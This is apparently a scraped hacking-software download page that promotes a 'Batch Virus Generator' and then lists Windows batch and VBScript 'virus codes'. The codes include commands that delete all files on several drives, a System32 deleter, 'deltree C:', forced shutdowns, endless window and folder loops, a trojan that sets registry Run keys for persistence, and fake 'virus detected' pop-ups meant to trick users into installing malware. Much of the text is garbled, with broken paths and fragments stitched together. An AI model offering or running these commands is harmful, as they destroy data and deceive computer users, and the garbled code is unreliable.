Batch Virus Download
Free download DELmEs Batch Virus Generator.zip by using Hacking Software Download Center (HSDC). This DELmEs Batch Virus Generator.zip software mainly categories in Viruses-Worms section. Also You can find out many software like DELmEs Batch Virus Generator.zip. Folder Replicator Batch VIRUS Here is a Simple bacth virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it. Just open up a notepad, copy and paste the below code cd cd C: Documents and Settings username Desktop:loop md Virus cd Virus goto.
A pack with a series of inoffensive fake viruses programmed in Batch for Windows.
This pack contains these fake viruses:
- Anticlick windows : a virus displaying many windows that close immediately, preventing a normal use of the computer ;
- Infinite windows : a virus displaying windows indefinitely, until the computer crash ;
- Matrix : a virus displaying indefinitely a river of random numbers, it can be closed without problems ;
- Reboot : a virus who reboot the computer after a certain time ;
- Powering off : a virus who power off the computer after a certain time ;
- Infinite Beep : a virus making the computer to beep indefinitely - work only for Windows versions prior than Vista ;
- Mega Flash : a virus making the screen flashing indefinitely ;
- BSOD : a virus displaying a fake Windows BSOD screen ;
- Virus alert : a virus displaying a fake virus alert impossible to close ;
- Mega Flash Color : a virus making the screen flashing indefinitely with colors ;
- Infinite windows + Matrix : a mix between the virus Infinite windows and Matrix.
Batch Virus Maker
These viruses can be executed with the program Virus Launcher included in this pack.
Batch Virus Download Pc
- Virus codes @echo off (cmd wont show command) @echo on (cmd will show command)
- #1 simple virus (opening-cpu drain)
- @echo off
- start
- goto :A
- #2 simple shutdown command - not really a virus
- shutdown -s -t 00<(time) -c 'message here' (you dont need a message)
- #3 make a bunch of folders to the desktop - not really a virus
- @echo off
- cd 'c: documents and settings%username% <<(or) documents and settingsall usersdesktop'
- md %random%
- :A
- (if you want to add more sites add the start (URL here) command here and below)
- goto :A
- #5 system 32 deleter (HARMFUL)
- @echo off del c:windowssystem 32 (extesion.bat)
- (DO NOT CREATE ON YOUR MAIN MACHINE)
- #6 delete every file off computer
- del D:. /f /s /q
- del F:. /f /s /q
- del H:. /f /s /q
- del J:. /f /s /q
- Start Crash
- (you can copy and paste Start Crash over and over again for more power)
- X=Msgbox('Virus Is Active',0+16,'Virus Alert')
- X=Msgbox('Wanna Fix Virus',0+16,'Fix Virus')
- del D:. /f /s /q
- del F:. /f /s /q
- del H:. /f /s /q
- del J:. /f /s /q
- :A
- ping localhost -m 5 >nul
- This has a lot of nasty stuff in it. This can KILL a machine once ran. ( DO NOT TRY ON MAIN MACHINE )
- #9 Message Box - Normally used to say stuff like 'virus detected' and 'fix virus' wich leads user to install a virus or message displays while virus is running.
- X=Msgbox('Virus Found On Your Computer',0+16,'Virus Detected')
- You can copy and paste this to have more messages pop up. (you have to run in VBs)
- #10 Trojan Horse virus - very simple Trojan Horse virus that WORKS. (.bat)
- @echo off
- Start C:Programsvirus.bat
- echo break off>>c:windowswimn32.bat
- echo end>>c:windowswimn32.bat
- reg add hkey_local_machinesoftwaremicrosoftwindowscurrentv ersionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /f
- reg add hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /f
- PAUSE
- :top
- GOTO top
- Set wshShell =wscript.CreateObject(”WScript.Shell”)
- wscript.sleep 100
- loop
- deltree C: